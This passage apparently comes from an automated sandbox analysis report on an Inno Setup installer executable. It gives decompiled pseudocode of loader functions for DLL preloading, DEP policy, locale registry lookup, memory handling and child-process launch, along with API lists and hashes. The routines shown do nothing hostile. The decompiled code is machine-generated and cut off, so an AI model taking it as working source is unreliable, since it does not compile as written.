                                                            							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
                                                            								E004086E4(0x4be668, 0x4b53f4);
                                                            							}
                                                            							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
                                                            							E0040E54C(_v12, _t111);
                                                            							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
                                                            							E0040E54C(_v16, _t111);
                                                            							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
                                                            							E0040E54C(_v20, _t111);
                                                            							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
                                                            							E0040E54C(_v24, _t111);
                                                            							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
                                                            							E0040E54C(_v28, _t111);
                                                            							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
                                                            							E0040E54C(_v32, _t111);
                                                            							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
                                                            							E0040E54C(_v36, _t111);
                                                            							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
                                                            							E0040E54C(_v40, _t111);
                                                            							E0040873C( &_v44, L"version.dll",  *0x4be668);
                                                            							E0040E54C(_v44, _t111);
                                                            							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
                                                            							E0040E54C(_v48, _t111);
                                                            							E0040873C( &_v52, L"comres.dll",  *0x4be668);
                                                            							E0040E54C(_v52, _t111);
                                                            							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
                                                            							E0040E54C(_v56, _t111);
                                                            							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
                                                            							E0040E54C(_v60, _t111);
                                                            						}
                                                            					}
                                                            					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
                                                            					if(_t42 != 0) {
                                                            						 *_t42(0x8001);
                                                            					}
                                                            					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
                                                            					if(_t43 != 0) {
                                                            						 *_t43(1); // executed
                                                            					}
                                                            					goto L19;
                                                            				}
                                                            			}






























                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                            • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                              • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                              • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                            • API String ID: 2248137261-3182217745
                                                            • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                            • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004AF91C(void* __eax) {
                                                            				char _v44;
                                                            				struct _SYSTEM_INFO _v80;
                                                            				long _v84;
                                                            				char _v88;
                                                            				long _t22;
                                                            				int _t28;
                                                            				void* _t37;
                                                            				struct _MEMORY_BASIC_INFORMATION* _t40;
                                                            				long _t41;
                                                            				void** _t42;
                                                            
                                                            				_t42 =  &(_v80.dwPageSize);
                                                            				 *_t42 = __eax;
                                                            				_t40 =  &_v44;
                                                            				GetSystemInfo( &_v80); // executed
                                                            				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
                                                            				if(_t22 == 0) {
                                                            					L17:
                                                            					return _t22;
                                                            				} else {
                                                            					while(1) {
                                                            						_t22 = _t40->AllocationBase;
                                                            						if(_t22 !=  *_t42) {
                                                            							goto L17;
                                                            						}
                                                            						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
                                                            							L15:
                                                            							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
                                                            							if(_t22 == 0) {
                                                            								goto L17;
                                                            							}
                                                            							continue;
                                                            						} else {
                                                            							_v88 = 0;
                                                            							_t41 = _t40->Protect;
                                                            							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
                                                            								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
                                                            								if(_t28 != 0) {
                                                            									_v88 = 1;
                                                            								}
                                                            							}
                                                            							_t37 = 0;
                                                            							while(_t37 < _t40->RegionSize) {
                                                            								E004AF914(_t40->BaseAddress + _t37);
                                                            								_t37 = _t37 + _v80.dwPageSize;
                                                            							}
                                                            							if(_v88 != 0) {
                                                            								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
                                                            							}
                                                            							goto L15;
                                                            						}
                                                            					}
                                                            					goto L17;
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                            • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                            • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                            • String ID:
                                                            • API String ID: 2441996862-0
                                                            • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                            • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
                                                            				char _v8;
                                                            				short _v12;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				void* _t29;
                                                            				void* _t40;
                                                            				intOrPtr* _t44;
                                                            				intOrPtr _t55;
                                                            				void* _t61;
                                                            
                                                            				_push(__ebx);
                                                            				_v24 = 0;
                                                            				_v20 = 0;
                                                            				_t44 = __edx;
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				_push(_t61);
                                                            				_push(0x40b104);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t61 + 0xffffffec;
                                                            				_t21 =  &_v16;
                                                            				L00403730();
                                                            				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
                                                            				E0040858C( &_v20, 4,  &_v16);
                                                            				E0040873C(_t44, _v20, _v8);
                                                            				_t29 = E0040AEF4( *_t44, _t44); // executed
                                                            				if(_t29 == 0) {
                                                            					_v12 = 0;
                                                            					E0040858C( &_v24, 4,  &_v16);
                                                            					E0040873C(_t44, _v24, _v8);
                                                            					_t40 = E0040AEF4( *_t44, _t44); // executed
                                                            					if(_t40 == 0) {
                                                            						E00407A20(_t44);
                                                            					}
                                                            				}
                                                            				_pop(_t55);
                                                            				 *[fs:eax] = _t55;
                                                            				_push(E0040B10B);
                                                            				E00407A80( &_v24, 2);
                                                            				return E00407A20( &_v8);
                                                            			}

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                              • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                              • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                            • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0040AEF4(char __eax, signed int __ebx) {
                                                            				char _v8;
                                                            				struct _WIN32_FIND_DATAW _v600;
                                                            				void* _t15;
                                                            				intOrPtr _t24;
                                                            				void* _t27;
                                                            
                                                            				_push(__ebx);
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				_push(_t27);
                                                            				_push(0x40af52);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t27 + 0xfffffdac;
                                                            				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
                                                            				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
                                                            					FindClose(_t15);
                                                            				}
                                                            				_pop(_t24);
                                                            				 *[fs:eax] = _t24;
                                                            				_push(E0040AF59);
                                                            				return E00407A20( &_v8);
                                                            			}

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                            • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
                                                            				char _v8;
                                                            				char* _v12;
                                                            				void* _v16;
                                                            				int _v20;
                                                            				short _v542;
                                                            				long _t51;
                                                            				long _t85;
                                                            				long _t87;
                                                            				long _t89;
                                                            				long _t91;
                                                            				long _t93;
                                                            				void* _t97;
                                                            				intOrPtr _t106;
                                                            				intOrPtr _t108;
                                                            				void* _t112;
                                                            				void* _t113;
                                                            				intOrPtr _t114;
                                                            
                                                            				_t112 = _t113;
                                                            				_t114 = _t113 + 0xfffffde4;
                                                            				_t97 = __edx;
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				_push(_t112);
                                                            				_push(0x40ad3d);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t114;
                                                            				if(_v8 != 0) {
                                                            					E0040A34C( &_v542, E004084EC(_v8), 0x105);
                                                            				} else {
                                                            					GetModuleFileNameW(0,  &_v542, 0x105);
                                                            				}
                                                            				if(_v542 == 0) {
                                                            					L18:
                                                            					_pop(_t106);
                                                            					 *[fs:eax] = _t106;
                                                            					_push(E0040AD44);
                                                            					return E00407A20( &_v8);
                                                            				} else {
                                                            					_v12 = 0;
                                                            					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            					if(_t51 == 0) {
                                                            						L10:
                                                            						_push(_t112);
                                                            						_push(0x40ad20);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t114;
                                                            						E0040A928( &_v542, 0x105);
                                                            						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
                                                            							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
                                                            								_v12 = E004053F0(_v20);
                                                            								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
                                                            								E00408550(_t97, _v12);
                                                            							}
                                                            						} else {
                                                            							_v12 = E004053F0(_v20);
                                                            							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
                                                            							E00408550(_t97, _v12);
                                                            						}
                                                            						_pop(_t108);
                                                            						 *[fs:eax] = _t108;
                                                            						_push(E0040AD27);
                                                            						if(_v12 != 0) {
                                                            							E0040540C(_v12);
                                                            						}
                                                            						return RegCloseKey(_v16);
                                                            					} else {
                                                            						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            						if(_t85 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            							if(_t87 == 0) {
                                                            								goto L10;
                                                            							} else {
                                                            								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            								if(_t89 == 0) {
                                                            									goto L10;
                                                            								} else {
                                                            									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            									if(_t91 == 0) {
                                                            										goto L10;
                                                            									} else {
                                                            										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
                                                            										if(_t93 != 0) {
                                                            											goto L18;
                                                            										} else {
                                                            											goto L10;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}





















                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                            • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                            • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                            				intOrPtr _t17;
                                                            				struct HWND__* _t21;
                                                            				struct HWND__* _t22;
                                                            				struct HWND__* _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t28;
                                                            				intOrPtr _t36;
                                                            				intOrPtr _t39;
                                                            				int _t40;
                                                            				intOrPtr _t41;
                                                            				intOrPtr _t43;
                                                            				struct HWND__* _t46;
                                                            				intOrPtr _t47;
                                                            				intOrPtr _t50;
                                                            				intOrPtr _t60;
                                                            				intOrPtr _t62;
                                                            				intOrPtr _t68;
                                                            				intOrPtr _t69;
                                                            				intOrPtr _t70;
                                                            				void* _t73;
                                                            				void* _t74;
                                                            
                                                            				_t74 = __eflags;
                                                            				_t72 = __esi;
                                                            				_t71 = __edi;
                                                            				_t52 = __ebx;
                                                            				_pop(_t62);
                                                            				 *[fs:eax] = _t62;
                                                            				_t17 =  *0x4c1d88; // 0x0
                                                            				 *0x4c1d88 = 0;
                                                            				E00405CE8(_t17);
                                                            				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
                                                            				 *0x4ba450 = _t21;
                                                            				_t22 =  *0x4ba450; // 0x302cc
                                                            				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
                                                            				_t25 =  *0x4ba450; // 0x302cc
                                                            				 *(_t73 - 0x58) = _t25;
                                                            				 *((char*)(_t73 - 0x54)) = 0;
                                                            				_t26 =  *0x4c1d90; // 0x4d703c
                                                            				_t4 = _t26 + 0x20; // 0x415c9b
                                                            				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
                                                            				 *((char*)(_t73 - 0x4c)) = 0;
                                                            				_t28 =  *0x4c1d90; // 0x4d703c
                                                            				_t7 = _t28 + 0x24; // 0xcb000
                                                            				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
                                                            				 *((char*)(_t73 - 0x44)) = 0;
                                                            				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
                                                            				_push( *((intOrPtr*)(_t73 - 0x40)));
                                                            				_push( *0x4c1d84);
                                                            				_push(0x4b6680);
                                                            				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
                                                            				_push( *((intOrPtr*)(_t73 - 0x5c)));
                                                            				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
                                                            				_t36 =  *0x4c1d9c; // 0x0, executed
                                                            				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
                                                            				if( *0x4ba448 != 0xffffffff) {
                                                            					_t50 =  *0x4ba448; // 0x0
                                                            					E004AF60C(_t50);
                                                            				}
                                                            				_pop(_t68);
                                                            				 *[fs:eax] = _t68;
                                                            				_push(E004B6554);
                                                            				_t39 =  *0x4c1d88; // 0x0
                                                            				_t40 = E00405CE8(_t39);
                                                            				if( *0x4c1d9c != 0) {
                                                            					_t70 =  *0x4c1d9c; // 0x0
                                                            					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
                                                            				}
                                                            				if( *0x4c1d94 != 0) {
                                                            					_t47 =  *0x4c1d94; // 0x0
                                                            					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
                                                            				}
                                                            				if( *0x4ba450 != 0) {
                                                            					_t46 =  *0x4ba450; // 0x302cc
                                                            					_t40 = DestroyWindow(_t46); // executed
                                                            				}
                                                            				if( *0x4c1d78 != 0) {
                                                            					_t41 =  *0x4c1d78; // 0x0
                                                            					_t60 =  *0x4c1d7c; // 0x1
                                                            					_t69 =  *0x426bb0; // 0x426bb4
                                                            					E00408D08(_t41, _t60, _t69);
                                                            					_t43 =  *0x4c1d78; // 0x0
                                                            					E0040540C(_t43);
                                                            					 *0x4c1d78 = 0;
                                                            					return 0;
                                                            				}
                                                            				return _t40;
                                                            			}

























                                                            APIs
                                                              • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                            • SetWindowLongW.USER32 ref: 004B641E
                                                              • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                              • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                              • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                              • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(000302CC,004B6554), ref: 004B6514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                            • String ID: /SL5="$%x,%d,%d,$<pM$InnoSetupLdrWindow$STATIC
                                                            • API String ID: 3586484885-2916600167
                                                            • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                            • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0040426C(void* __eax, signed int __edi, void* __ebp) {
                                                            				struct _MEMORY_BASIC_INFORMATION _v44;
                                                            				void* _v48;
                                                            				signed int __ebx;
                                                            				void* _t58;
                                                            				signed int _t61;
                                                            				int _t65;
                                                            				signed int _t67;
                                                            				void _t70;
                                                            				int _t71;
                                                            				signed int _t78;
                                                            				void* _t79;
                                                            				signed int _t81;
                                                            				intOrPtr _t82;
                                                            				signed int _t87;
                                                            				signed int _t88;
                                                            				signed int _t89;
                                                            				signed int _t92;
                                                            				void* _t96;
                                                            				signed int _t99;
                                                            				void* _t103;
                                                            				intOrPtr _t104;
                                                            				void* _t106;
                                                            				void* _t108;
                                                            				signed int _t113;
                                                            				void* _t115;
                                                            				void* _t116;
                                                            
                                                            				_t56 = __eax;
                                                            				_t89 =  *(__eax - 4);
                                                            				_t78 =  *0x4bb059; // 0x0
                                                            				if((_t89 & 0x00000007) != 0) {
                                                            					__eflags = _t89 & 0x00000005;
                                                            					if((_t89 & 0x00000005) != 0) {
                                                            						_pop(_t78);
                                                            						__eflags = _t89 & 0x00000003;
                                                            						if((_t89 & 0x00000003) == 0) {
                                                            							_push(_t78);
                                                            							_push(__edi);
                                                            							_t116 = _t115 + 0xffffffdc;
                                                            							_t103 = __eax - 0x10;
                                                            							E00403C48();
                                                            							_t58 = _t103;
                                                            							 *_t116 =  *_t58;
                                                            							_v48 =  *((intOrPtr*)(_t58 + 4));
                                                            							_t92 =  *(_t58 + 0xc);
                                                            							if((_t92 & 0x00000008) != 0) {
                                                            								_t79 = _t103;
                                                            								_t113 = _t92 & 0xfffffff0;
                                                            								_t99 = 0;
                                                            								__eflags = 0;
                                                            								while(1) {
                                                            									VirtualQuery(_t79,  &_v44, 0x1c);
                                                            									_t61 = VirtualFree(_t79, 0, 0x8000);
                                                            									__eflags = _t61;
                                                            									if(_t61 == 0) {
                                                            										_t99 = _t99 | 0xffffffff;
                                                            										goto L10;
                                                            									}
                                                            									_t104 = _v44.RegionSize;
                                                            									__eflags = _t113 - _t104;
                                                            									if(_t113 > _t104) {
                                                            										_t113 = _t113 - _t104;
                                                            										_t79 = _t79 + _t104;
                                                            										continue;
                                                            									}
                                                            									goto L10;
                                                            								}
                                                            							} else {
                                                            								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
                                                            								if(_t65 == 0) {
                                                            									_t99 = __edi | 0xffffffff;
                                                            								} else {
